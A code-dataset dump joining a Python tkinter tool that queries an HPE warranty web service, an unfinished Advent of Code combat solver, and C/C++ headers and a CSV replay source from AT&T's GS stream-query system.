import numpy as np
import pandas as pd
import re
import tkinter as tk
from datetime import datetime as dt
##########################################################
def getWarranty():
serialNo = serial_no.get()
partNo = product_no.get()
data = {'SerialNumber': str(serialNo),
'ProductNumber': str(partNo)}
s = requests.Session()
url = "http://www.smartenablement.com/HPE/PostWarranties/ws.asmx/GetEntitlement"
headers = {
'Host': 'www.smartenablement.com',
'Connection': 'keep-alive',
'Content-Length': '58',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'http://www.smartenablement.com',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36',
'Content-Type': 'application/json; charset=UTF-8',
'Referer': 'http://www.smartenablement.com/HPE/PostWarranties/LookUp.aspx?&Serial=' + str(serialNo) + '&Product=' + str(partNo),
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9'}
# 'Cookie': 'ASP.NET_SessionId=gr1celcvd5foqv2aavtijzmq'}
currentWarr = post(s, url, data, headers)
url = 'http://www.smartenablement.com/HPE/PostWarranties/ws.asmx/GetSupportServices'
headers = {
'Host': 'www.smartenablement.com',
'Connection': 'keep-alive',
'Content-Length': '30',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Origin': 'http://www.smartenablement.com',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36',
'Content-Type': 'application/json; charset=UTF-8',
'Referer': 'http://www.smartenablement.com/HPE/PostWarranties/LookUp.aspx?&Serial=' + str(serialNo) + '&Product=' + str(partNo),
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9'}
# 'Cookie': 'ASP.NET_SessionId=gr1celcvd5foqv2aavtijzmq'}
warrOptions = post(s, url, data, headers)
a = json.loads(warrOptions)
olist = a['d']['RecommendedSupportServiceDisplayItems']
olist2 = a['d']['SupportServiceDisplayItems']
###############################################################
b=json.loads(currentWarr)
wlist = b['d']['EntitlementSummaryList']
currentWarDf = pd.DataFrame(wlist, columns=['endDate','startDate','packageOfferReferenceDescription','supportServiceProductNumber'])
currentWarDf = currentWarDf.rename(columns={'endDate':"End Date",'startDate':'Start Date','packageOfferReferenceDescription':'Description','supportServiceProductNumber':'Product Number'}).sort_values(by=['End Date'], ascending=False)
currentWarDf['End Date'] = currentWarDf['End Date'].astype('datetime64[ns]')
currentWarDf['Start Date'] = currentWarDf['Start Date'].astype('datetime64[ns]')
currentWarDf['Description'] = currentWarDf['Description'].astype(str)
model_regex = re.compile(r'\b(D|M)L\d*[a-zA-Z]?\s[a-zA-Z]*\d(/sv2)?\b', re.I)
svr_modelno = "Model # not found."
for i in currentWarDf['Description']:
if model_regex.search(i):
a = model_regex.search(i)
svr_modelno = a.group()
break
try:
original_date = min(currentWarDf['Start Date'])
except:
print('Original date not found.')
pass
try:
end_date = max(currentWarDf['End Date'])
except:
print('End date not found.')
pass
currentWarDf_noncurr = currentWarDf[currentWarDf['End Date']<dt.today()]
currentWarDf = currentWarDf[currentWarDf['End Date']>dt.today()]
wOptionsDf1 = pd.DataFrame(olist)
wOptionsDf2 = pd.DataFrame(olist2)
wOptionsDf = pd.concat([wOptionsDf1, wOptionsDf2])
duras = list()
levels = list()
wOptionsDf = wOptionsDf[~wOptionsDf['SupportServiceProductDescription'].str.contains('DMR')]
wOptionsDf = wOptionsDf[~wOptionsDf['SupportServiceProductDescription'].str.contains('Proactive')]
for desc in wOptionsDf['SupportServiceProductDescription']:
dura_regex = re.compile(r'\b\d\s\wear\b').search(desc)
duras.append(dura_regex.group())
if re.compile(r'(next.business.day)|(nbd)', re.I).search(desc):
levels.append("NBD")
elif re.compile(r'(24x7)|(4hr)', re.I).search(desc):
levels.append("4Hr")
elif re.compile(r'(call.to.repair)|(6HR)', re.I).search(desc):
levels.append('6Hr CTR')
else:
levels.append('no data')
wOptionsDf['Duration'] = duras
wOptionsDf['Warranty Type'] = levels
wOptionsDf = wOptionsDf.drop(columns=['SupportServiceProductDescription', 'CoverageWindow'])
wOptionsDf = wOptionsDf.rename(columns={'PriceLocalList': 'List Price', 'SupportServiceProductNumber': 'Product Number'})
wOptionsDf = wOptionsDf.sort_values(by=['List Price', 'Duration'])
#######################################################################################
# wOptionsDf
global output_label
output_data = ''
output_data += 'Warranty Information'+'\n'+'Model: ' + str(svr_modelno)+'\n'+'Serial# ' + str(serialNo)+'\n'+'\n'
if end_date>dt.today():
curr_warr_pn = currentWarDf['Product Number'].tolist()[0]
wOptionsDf['Product Number'] = wOptionsDf['Product Number'].apply(lambda s: s + '*' if s == curr_warr_pn else s)
regex_timeleft = re.compile(r'(.*)(\s\d\d:\d\d:\d.*)')
h = str(end_date - dt.today())
time_left = regex_timeleft.search(h).group(1)
output_data += '\n''\n''Current warranty: ''\n'
output_data += currentWarDf.to_string(index=False)
output_data += '\n' + str(time_left) + ' until expiration.'
else:
output_data += 'Warranty expired.'
# print('\n'"Previous warranties:")
# print(currentWarDf_noncurr.to_string(index=False))
wOptionsDf['List Price'] = wOptionsDf['List Price'].apply(lambda s: '$' + s)
output_data += '\n''\n'"Foundation Care Support Renewal options:"'\n'
output_data += wOptionsDf.to_string(index=False)
output_data += '\n'" *current warranty"
output_label['text'] = output_data
def post(session, url, data, headers):
r = session.post(url, json=data, headers=headers)
result = jprint(r.json())
return result
def jprint(obj):
# create a formatted string of the Python JSON object
text = json.dumps(obj, sort_keys=True, indent=4)
return text
#########################################################
root=tk.Tk()
canvas = tk.Canvas(root, height=1500, width=1400)
frame1 = tk.Frame(root, bg='white')
frame1.place(relx=0.5, rely=0, relwidth=0.5, relheight=1)
frame2 = tk.Frame(root, bg='grey')
frame2.place(relx=0, rely=0, relwidth=0.5, relheight=1)
title_label = tk.Label(frame2, text='Server Warranty Checker', font=('Courier New', 12), bg='grey')
title_label.grid(row=1, column=1)
serial_label = tk.Label(frame2, text='Enter serial number:', font=('Courier New', 10), bg='grey')
serial_label.grid(row=3, column=1)
serial_no = tk.Entry(frame2, font=('Courier New', 8))
serial_no.grid(row = 4, column=1)
pn_label = tk.Label(frame2, text='Enter part number:', font=('Courier New', 10), bg='grey')
pn_label.grid(row=6, column=1)
product_no = tk.Entry(frame2, font=('Courier New', 8))
product_no.grid(row = 7, column=1)
output_label = tk.Label(frame1, font=('Courier New', 8), bg='white')
output_label.place(relx=0.05, rely=0.05, relheight=0.9, relwidth=0.9)
submit_btn = tk.Button(frame2, text='Submit', font=('Courier New', 8), bg='blue', command= getWarranty)
submit_btn.grid(row = 8, column=1)
#########################################################
root.mainloop()
<file_sep>/AoCFile.py
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
############################################################################
class Unit:
########################################################################
def __init__(self, ID, yx, mapicon):
self.id = ID
self.hp = 200
self.atk = 3
self.yx = yx
self.race = {'E':'Elf', 'G':'Goblin'}[mapicon]
self.mapicon = mapicon
self.enemyicon = {'E':'G', 'G':'E'}[mapicon]
self.target = None
def attack(self, Units):
# figure out how many enemies are adjacent
adjtiles = {tuple(map(sum, zip(self.yx, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}}
adjenemies = [x for x in Units if Units[x].yx in adjtiles]
# if enemies adj, pick lowest hp and attack
if not adjenemies:
print('Cannot attack - no enemies adjacent')
elif adjenemies:
lowestHPval = min([Units[x].hp for x in adjenemies])
targetcoords = [Units[enemy].yx for enemy in adjenemies if Units[enemy].hp == lowestHPval]
target = ''.join(x for x in Units if Units[x].yx == targetcoords)
Units[target].hp -= self.atk
if Units[target].hp <= 0:
del Units[target]
def move(self, Units):
nextcoord = findmove(self, Units)
self.yx = nextcoord
self.target = None
########################################################################
def findmove(self, Units): # evaluate attacktiles movelist to find correct move
attacktiles = set()
EnemyList = {Unit for Unit in Units if Unit.race != self.race}
for Enemy in EnemyList:
attacktiles = attacktiles.union([x for x in {tuple(map(sum, zip(Enemy.yx, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.'])
# find attack tiles that are currently reachable
availtiles = findavailtiles(self, set(), self.yx, 0, attacktiles, dict()) #{(y, x): distance}
# determine closest attack tile(s)
closest = [i for i, j in targettiles.items() if j == min(targettiles.values())]
# use reading order to decide on target tile
self.target = sorted(sorted(closest, key=lambda x: x[1]), key=lambda x: x[0])[0]
# figure out which way to move
adjtiles = [x for x in {tuple(map(sum, zip(self.yx, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.']
moveops = dict()
for adjtile in adjtiles:
moveops.update({adjtile: evalmoves(self, set(), adjtile, 0, 9999)})
moveops = [i for i, j in moveops.items() if j == min(moveops.values())]
nextcoord = sorted(sorted(moveops, key=lambda x: x[1]), key=lambda x: x[0])[0]
return nextcoord
########################################################################
def findavailtiles(self, seen, curcoord, dist, attacktiles, availtiles):
seen.add(curcoord)
if curcoord in attacktiles:
if curcoord not in availtiles:
availtiles.update({curcoord: dist})
elif curcoord in availtiles and availtiles[curcoord] > dist:
availtiles[curcoord] = dist
dist += 1
nextcoords = [x for x in {tuple(map(sum, zip(curcoord, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.' and (x[0],x[1]) not in seen]
##### recursive function for further tiles
for nextcoord in nextcoords:
availtiles = findavailtiles(self, seen, nextcoord, dist, attacktiles, availtiles)
return availtiles
########################################################################
def evalmoves(self, seen, curcoord, dist, movesneeded):
seen.add(curcoord)
if curcoord == self.target:
if movesneeded > dist:
movesneeded = dist
dist += 1
nextcoords = [x for x in {tuple(map(sum, zip(curcoord, Dir))) for Dir in {(-1, 0), (1, 0), (0, 1), (0, -1)}} if MapData[x[0]][x[1]] != '.' and (x[0],x[1]) not in seen]
##### recursive function for further tiles
for nextcoord in nextcoords:
movesneeded = evalmoves(self, seen, nextcoord, dist, movesneeded)
return movesneeded
| 09317d05fdb9488dc99e7b1fc8d06cb53b4cb2a3 | [
"Python"
] | 2 | Python | yayyuh/Github | 13cc0adaf60f7ce260c7543695ae7b2aa6935086 | c2c781d15f6d45d49917a5e321bb9a0257939f27 |
refs/heads/master | <file_sep>This directory is used for generated .h files
All .h files in this directory will be included in
the generated *_lfta.c files (e.g. localhost_lfta.c)
<file_sep>/* A Bison parser, made by GNU Bison 3.0.4. */
/* Bison interface for Yacc-like parsers in C
Copyright (C) 1984, 1989-1990, 2000-2015 Free Software Foundation, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>. */
/* As a special exception, you may create a larger work that contains
part or all of the Bison parser skeleton and distribute that work
under terms of your choice, so long as that work isn't itself a
parser generator using the skeleton or a modified version thereof
as a parser skeleton. Alternatively, if you modify or redistribute
the parser skeleton itself, you may (at your option) remove this
special exception, which will cause the skeleton and the resulting
Bison output files to be licensed under the GNU General Public
License without this special exception.
This special exception was added by the Free Software Foundation in
version 2.2 of Bison. */
#ifndef YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
# define YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED
/* Debug traces. */
#ifndef YYDEBUG
# define YYDEBUG 0
#endif
#if YYDEBUG
extern int FtaParserdebug;
#endif
/* Token type. */
#ifndef YYTOKENTYPE
# define YYTOKENTYPE
enum yytokentype
{
NAME = 258,
STRING_TOKEN = 259,
INTNUM = 260,
LONGINTNUM = 261,
APPROXNUM = 262,
OR = 263,
AND = 264,
NOT = 265,
COMPARISON = 266,
SHIFT_OP = 267,
UMINUS = 268,
SEMICOLON = 269,
LEFTBRACE = 270,
RIGHTBRACE = 271,
BY = 272,
AS = 273,
AGGR = 274,
FROM = 275,
INNER_JOIN = 276,
FILTER_JOIN = 277,
OUTER_JOIN = 278,
LEFT_OUTER_JOIN = 279,
RIGHT_OUTER_JOIN = 280,
WATCHLIST_JOIN = 281,
GROUP = 282,
HAVING = 283,
IN = 284,
SELECT = 285,
WATCHLIST = 286,
WHERE = 287,
SUPERGROUP = 288,
CLEANING_WHEN = 289,
CLEANING_BY = 290,
CLOSING_WHEN = 291,
SUCH = 292,
THAT = 293,
CUBE = 294,
ROLLUP = 295,
GROUPING_SETS = 296,
TRUE_V = 297,
FALSE_V = 298,
TIMEVAL_L = 299,
HEX_L = 300,
LHEX_L = 301,
IP_L = 302,
IPV6_L = 303,
MERGE = 304,
SLACK = 305,
DEFINE_SEC = 306,
PARAM_SEC = 307,
PROTOCOL = 308,
TABLE = 309,
STREAM = 310,
FTA = 311,
UNPACK_FCNS = 312,
OPERATOR = 313,
OPERATOR_VIEW = 314,
FIELDS = 315,
SUBQUERIES = 316,
SELECTION_PUSHDOWN = 317
};
#endif
/* Value type. */
#if ! defined YYSTYPE && ! defined YYSTYPE_IS_DECLARED
union YYSTYPE
{
#line 52 "fta.y" /* yacc.c:1909 */
int intval;
double floatval;
char *strval;
int subtok;
string_t *stringval;
/* for FTA definition. */
literal_t *litval;
scalarexp_t *scalarval;
se_list_t *se_listval;
select_list_t *select_listval;
table_exp_t *tblp;
predicate_t *predp;
literal_list_t *lit_l;
tablevar_t *table;
tablevar_list_t *tbl_list;
colref_t *colref;
ifpref_t *ifpref;
colref_list_t *clist;
var_defs_t *var_defs;
var_pair_t *var_pair;
gb_t *gb_val;
gb_list_t *gb_list;
list_of_gb_list_t *list_of_gb_list;
extended_gb_t *extended_gb;
extended_gb_list_t *extended_gb_list;
query_list_t *q_list;
/* For table definition */
field_entry *field_t;
field_entry_list *field_list_t;
table_def *table_def_t;
table_list *table_list_schema;
param_list *plist_t;
name_vec *namevec_t;
subquery_spec *subq_spec_t;
subqueryspec_list *subqueryspec_list_t;
unpack_fcn *ufcn;
unpack_fcn_list *ufcnl;
#line 162 "fta.tab.cc.h" /* yacc.c:1909 */
};
typedef union YYSTYPE YYSTYPE;
# define YYSTYPE_IS_TRIVIAL 1
# define YYSTYPE_IS_DECLARED 1
#endif
extern YYSTYPE FtaParserlval;
int FtaParserparse (void);
#endif /* !YY_FTAPARSER_FTA_TAB_CC_H_INCLUDED */
<file_sep>#ifndef __CSV_PARSER__
#define __CSV_PARSER__
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include "packet.h"
// maximum number of fields to be parsed in CSV record
static gs_uint32_t max_field = CSVELEMENTS;
static gs_uint8_t delim;
static inline void csv_set_delim(gs_uint8_t del) {
delim = del;
}
static inline void csv_set_maxfield(gs_uint32_t max) {
max_field = max;
}
static inline void csv_parse_line(gs_sp_t line, ssize_t len) {
cur_packet.systemTime=time(0);
gs_uint32_t i=0;
gs_uint32_t p=0;
gs_uint32_t last_field_start=0;
while(i<len){
last_field_start=i;
cur_packet.record.csv.fields[p]=&line[i];
while((i<len)&&(line[i] != delim)) {
i++;
}
cur_packet.record.csv.field_lens[p]=i-last_field_start;
i++;
p++;
}
cur_packet.record.csv.numberfields=p;
}
#endif
<file_sep>#ifndef RTS_STRING_H
#define RTS_STRING_H
#ifdef __cplusplus
extern "C" {
#endif
/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <stdint.h>
#include<math.h>
#include "gsconfig.h"
#include "gstypes.h"
#define IS_BIG_ENDIAN (*(uint16_t *)"\0\xff" < 0x100)
// struct string32 matches vstring32, its the packed record format.
// struct gs_string is the in-memory format.
struct string32{
gs_int32_t length;
gs_int32_t offset;
gs_int32_t reserved;
};
/* struct gs_string has to match definition in host.h however, the data
types differ */
struct gs_string {
gs_int32_t length;
gs_sp_t data;
struct FTA * owner;
};
#include "fta.h"
#include "rts.h"
/* Basic string operation */
gs_retval_t str_assign_with_copy(struct FTA *, struct gs_string * dest, struct gs_string * src);
gs_retval_t str_assign_with_copy_in_tuple(struct string32 * dest, struct gs_string * src,
gs_sp_t start, gs_sp_t buf);
#define str_destroy(s) {if ((s)->owner!=0) fta_free((s)->owner,(s)->data);}
gs_retval_t str_replace(struct FTA *, struct gs_string * dest, struct gs_string * src );
#define str_length(s) (s)->length
/* Searching within a string */
gs_retval_t str_exists_substr( struct gs_string * str1, struct gs_string * str2);
/* String comparison */
gs_retval_t str_compare( struct gs_string * str1, struct gs_string * str2);
/* String equality */
gs_retval_t str_equal( struct gs_string * str1, struct gs_string * str2);
/* Construct a string constant */
gs_retval_t str_constructor(struct gs_string *s, gs_csp_t l);
/* string hash */
#define string_hash(s) lfta_V_STR_to_hash((*(s)))
/* External Function definitions */
#define ULLMIN(x,y) (unsigned long long)(((x)<(y)?(x):(y)))
#define ULLMAX(x,y) (unsigned long long)(((x)<(y)?(y):(x)))
#define LLMIN(x,y) (long long int)(((x)<(y)?(x):(y)))
#define LLMAX(x,y) (long long int)(((x)<(y)?(y):(x)))
#define UMIN(x,y) (unsigned int)(((x)<(y)?(x):(y)))
#define UMAX(x,y) (unsigned int)(((x)<(y)?(y):(x)))
#define LMIN(x,y) (int)(((x)<(y)?(x):(y)))
#define LMAX(x,y) (int)(((x)<(y)?(y):(x)))
#define FMIN(x,y) (double)(((x)<(y)?(x):(y)))
#define FMAX(x,y) (double)(((x)<(y)?(y):(x)))
// type conversion
#define INT(c) ((int)(c))
#define UINT(c) ((unsigned int)(c))
#define ULLONG(c) ((unsigned long long)(c))
#define LLONG(c) ((long long int)(c))
#define FLOAT(c) ((double)(c))
// comparison
#define EQ(x,y) ((x)==(y))
#define GEQ(x,y) ((x)>=(y))
#define GE(x,y) ((x)>(y))
#define LEQ(x,y) ((x)<=(y))
#define LE(x,y) ((x)<(y))
// if_else
#define if_else_f(x,y,z) (double)(((x)==0?(z):(y)))
#define if_else_ll(x,y,z) (long long int)(((x)==0?(z):(y)))
#define if_else_ul(x,y,z) (unsigned long long)(((x)==0?(z):(y)))
#define if_else_u(x,y,z) (unsigned int)(((x)==0?(z):(y)))
#define if_else_i(x,y,z) (int)(((x)==0?(z):(y)))
// Cast away temporality
#define non_temporal(x)(x)
// endian swap
#define endian_swap_ui(x) ( (( (x) & 0xFF000000) >> 24) | (( (x) & 0x00FF0000) >> 8) | (( (x) & 0x0000FF00) << 8) | (( (x) & 0x000000FF) << 24) )
// Access math libraries
#define sqrt(x) sqrt(x)
#define pow(x,y) pow((x),(y))
#define sin(x) sin(x)
#define cos(x) cos(x)
#define tan(x) tan(x)
#define asin(x) asin(x)
#define acos(x) acos(x)
#define atan(x) atan(x)
#define log(x) log(x)
#define log2(x) log2(x)
#define log10(x) log10(x)
#define ceil(x) ceil(x)
#define floor(x) floor(x)
#define fmod(x) fmod(x)
#define trunc(x) trunc(x)
gs_uint32_t str_match_offset( gs_uint32_t offset, struct gs_string * s1, struct gs_string * s2);
gs_uint32_t byte_match_offset( gs_uint32_t offset, gs_uint32_t val, struct gs_string * s2);
gs_param_handle_t register_handle_for_str_regex_match_slot_1(struct FTA * f,
struct gs_string* pattern);
gs_uint32_t str_regex_match(struct gs_string* str, gs_param_handle_t pattern_handle);
gs_retval_t deregister_handle_for_str_regex_match_slot_1(gs_param_handle_t handle);
gs_param_handle_t register_handle_for_str_partial_regex_match_slot_1(struct FTA * f,
struct gs_string* pattern);
gs_uint32_t str_partial_regex_match(struct gs_string* str,
gs_param_handle_t pattern_handle,
gs_uint32_t maxlen);
gs_retval_t deregister_handle_for_str_partial_regex_match_slot_1(
gs_param_handle_t
handle);
// ----------------------------------
// Substring functions
inline static gs_retval_t str_truncate(struct gs_string * result, struct gs_string *str, gs_uint32_t length) {
result->data=str->data;
result->length=(str->length<length)?str->length:length;
return 0;
}
gs_retval_t str_suffix(struct gs_string * ret, struct gs_string *s, gs_uint32_t n);
gs_retval_t get_list_entry(struct gs_string * ret, struct gs_string *l, struct gs_string *sep, gs_uint32_t pos);
// ----------------------------------
// constant string conversions
gs_param_handle_t register_handle_for_strtoi_c_slot_0(struct FTA * f, struct gs_string* istr) ;
gs_retval_t deregister_handle_for_strtoi_c_slot_0(gs_param_handle_t h) ;
#define strtoi_c(h) ((unsigned int)(h))
gs_param_handle_t register_handle_for_strtoip_c_slot_0(struct FTA * f, struct gs_string* istr) ;
gs_retval_t deregister_handle_for_strtoip_c_slot_0(gs_param_handle_t h) ;
#define strtoip_c(h) ((unsigned int)(h))
////////////////////////////////////////////////
/// IPV6
#ifndef IPV6_STR
#define IPV6_STR
struct ipv6_str{
gs_uint32_t v[4];
};
#endif
gs_int32_t ipv6_compare( struct ipv6_str i1, struct ipv6_str i2);
gs_int32_t Ipv6_Constructor(struct ipv6_str *s, char *l);
struct ipv6_str And_Ipv6(const struct ipv6_str i1, const struct ipv6_str i2);
struct ipv6_str Or_Ipv6(const struct ipv6_str i1, const struct ipv6_str i2);
struct ipv6_str hton_ipv6(struct ipv6_str s);
struct ipv6_str ntoh_ipv6(struct ipv6_str s);
////////////////////////////////////////////////
/// Regex pattern extraction based on signature library for VideoNOC
gs_param_handle_t register_handle_for_signaturelib_get_content_id_slot_2(struct FTA * f, struct gs_string* signature_file);
gs_uint32_t signaturelib_get_content_id(struct gs_string* result, struct gs_string* url, gs_uint32_t content_length, gs_param_handle_t handle);
gs_retval_t deregister_handle_for_signaturelib_get_content_id_slot_2(gs_param_handle_t handle);
gs_uint32_t signaturelib_get_fqdn(struct gs_string* result);
gs_uint32_t signaturelib_get_channel_type(struct gs_string* result);
#ifdef __cplusplus
}
#endif
#endif
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <zlib.h>
#include <errno.h>
#include <stdio.h>
#include <dirent.h>
extern "C" {
#include "gsconfig.h"
#include "gshub.h"
#include "gstypes.h"
#include "lapp.h"
#include "fta.h"
#include "packet.h"
#include "schemaparser.h"
#include "lfta/rts.h"
void fta_init(gs_sp_t device);
void rts_fta_process_packet(struct packet * p);
void rts_fta_done();
}
time_t st_time;
#define CSVMAXLINE 1000000
#define CHUNK 262144
static gs_uint8_t in[CHUNK + CSVMAXLINE];
static gs_uint8_t out[CHUNK + CSVMAXLINE];
#define FILEWAIT_TIMEOUT 10000 // timeout value for getting next file (in microseconds)
gs_uint32_t max_field_csv = CSVELEMENTS;
z_stream strm;
#ifdef BSA_ENABLED
#include "bsa_stream.hpp"
#include "bsa_util.hpp"
BSA::FileStream::ISubStream* stream;
BSA::FileStream::IFileHandle* ifh;
BSA::FileStream::Reader* reader;
#endif
#ifdef SSL_ENABLED
#include <openssl/pem.h>
#include <openssl/x509.h>
#include <openssl/x509v3.h>
#include <openssl/ssl.h>
#include <openssl/crypto.h>
#include <openssl/err.h>
EVP_PKEY *rkey;
PKCS7 *p7;
BIO* mem_io;
char pwd[CSVMAXLINE];
// callback for passing password to private key reader
int pass_cb(char *buf, int size, int rwflag, void *u) {
int len = strlen(pwd);
memcpy(buf, pwd, len);
return len;
}
#endif
gs_sp_t dev;
static int listensockfd=-1;
static int fd=-1;
static struct packet cur_packet;
static gs_sp_t name;
static gs_sp_t dir_name;
struct dirent **namelist;
static gs_int32_t num_dir_files;
static gs_sp_t line;
static ssize_t len;
static size_t line_len;
static gs_uint32_t lineend=0;
static gs_uint8_t csvdel = ',';
static gs_uint32_t verbose=0;
static gs_uint32_t startupdelay=0;
static gs_uint32_t singlefile=0;
static gs_uint32_t use_gzip=0;
static gs_uint32_t use_bsa=0;
static gs_uint32_t use_decryption=0;
static gs_uint32_t gshub=0;
static int socket_desc=0;
#include "lfta/csv_parser.h"
// leftover bytes not consumed at the end of the data chunk
gs_uint32_t leftover = 0;
uint64_t get_posix_clock_time ()
{
struct timespec ts;
if (clock_gettime (CLOCK_MONOTONIC, &ts) == 0)
return (uint64_t) (ts.tv_sec * 1000 + ts.tv_nsec / 1000000);
else
return 0;
}
static void init_inflate() {
gs_int32_t ret;
/* allocate inflate state */
strm.zalloc = Z_NULL;
strm.zfree = Z_NULL;
strm.opaque = Z_NULL;
strm.avail_in = 0;
strm.next_in = Z_NULL;
ret = inflateInit2(&strm, 15 /* window bits */ | 32 /* use gzip */);
if (ret != Z_OK) {
print_error((gs_sp_t)"csv::inflateInit2");
exit(10);
}
}
static void csv_replay_check_messages() {
if (fta_start_service(0)<0) {
print_error((gs_sp_t)"Error:in processing the msg queue for a replay file");
exit(9);
}
}
static gs_int32_t read_chunk_socket(gs_sp_t buffer, gs_uint32_t length){
gs_uint32_t r;
fd_set socket_rset;
fd_set socket_eset;
struct timeval socket_timeout;
gs_int32_t retval;
FD_ZERO(&socket_rset);
FD_SET(socket_desc,&socket_rset);
FD_ZERO(&socket_eset);
FD_SET(socket_desc,&socket_eset);
// timeout in one millisecond
socket_timeout.tv_sec = 0;
socket_timeout.tv_usec = 1000;
if ((retval = select(socket_desc+1,&socket_rset,0,&socket_eset,&socket_timeout))<=0) {
if (retval==0) {
// caught a timeout
return -1;
}
return -2;
}
if ((r=read(socket_desc, buffer + leftover, length)) <= 0) {
print_error((gs_sp_t)"ERROR:could not read data from csv stream");
return -2;
}
return r;
}
static void init_socket() {
endpoint gshub;
endpoint srcinfo;
struct sockaddr_in server;
gs_int32_t parserversion;
gs_uint32_t schemalen;
static gs_sp_t asciischema=0;
gs_int8_t buf[1024];
if (get_hub(&gshub)!=0) {
print_error((gs_sp_t)"ERROR:could not find gshub for data source");
exit(0);
}
if (get_streamsource(gshub,name,&srcinfo,1) !=0) {
print_error((gs_sp_t)"ERROR:could not find data source for stream\n");
exit(0);
}
socket_desc = socket(AF_INET , SOCK_STREAM , 0);
if (socket_desc == -1)
{
print_error((gs_sp_t)"ERROR:could not create socket for data stream");
exit(0);
}
server.sin_addr.s_addr = srcinfo.ip;
server.sin_family = AF_INET;
server.sin_port = srcinfo.port;
if (connect(socket_desc , (struct sockaddr *)&server , sizeof(server)) < 0) {
print_error((gs_sp_t)"ERROR: could not open connection to data source");
exit(0);
}
}
static void next_file() {
static gs_uint32_t file_pos = 0;
static gs_uint32_t scan_finished = 0;
char buf[CSVMAXLINE];
if (dir_name) {
if (scan_finished) {
if (verbose)
fprintf(stderr,"Done processing, waiting for things to shut down\n");
rts_fta_done();
// now just service message queue until we get killed or loose connectivity
while (true) {
fta_start_service(0); // service all waiting messages
usleep(1000); // sleep a millisecond
}
}
if (num_dir_files) { // we already started directory scan
free(name);
if (file_pos < num_dir_files) {
sprintf(buf, "%s/%s", dir_name, namelist[file_pos]->d_name);
name = strdup(buf);
free(namelist[file_pos]);
file_pos++;
} else {
free(namelist);
scan_finished = 1;
return;
}
} else {
num_dir_files = scandir(dir_name, &namelist, NULL, alphasort);
if (num_dir_files == -1) {
num_dir_files = 0;
print_error((gs_sp_t)"ERROR: Unable to scan directory");
return;
}
if (num_dir_files == 2) { // only . and . are there, empty dir
free(namelist[0]);
free(namelist[1]);
scan_finished = 1;
return;
} else
file_pos = 2;
sprintf(buf, "%s/%s", dir_name, namelist[file_pos]->d_name);
name = strdup(buf);
free(namelist[file_pos]);
file_pos++;
}
}
struct stat s;
if (verbose) {
fprintf(stderr,"Opening %s\n",name);
}
if (singlefile == 0) {
while (lstat(name, &s) != 0) {
if (errno != ENOENT) {
print_error((gs_sp_t)"csv::lstat unexpected return value");
exit(10);
}
csv_replay_check_messages();
usleep(FILEWAIT_TIMEOUT);
}
if (fd > 0) {
close(fd);
}
}
if ((fd = open(name, O_RDONLY)) < 0) {
print_error((gs_sp_t)"csv::open failed ");
exit(10);
}
posix_fadvise(fd, 0, 0, POSIX_FADV_SEQUENTIAL);
#ifdef SSL_ENABLED
if (use_decryption) {
// free SSL resources
if (mem_io)
BIO_free(mem_io);
if (p7)
PKCS7_free(p7);
FILE *fp = fdopen(fd, "r");
p7 = d2i_PKCS7_fp(fp, NULL);
if (p7 == NULL) {
print_error((gs_sp_t)"Error reading SMIME message from file");
exit(-1);
}
if(!(mem_io = PKCS7_dataDecode(p7, rkey, NULL, NULL))) {
print_error((gs_sp_t)"Error decoding PKCS7 file\n");
exit(-1);
}
fclose(fp);
}
#endif
if (!dir_name && !singlefile) {
unlink(name);
}
if (use_gzip) {
init_inflate();
}
}
#ifdef BSA_ENABLED
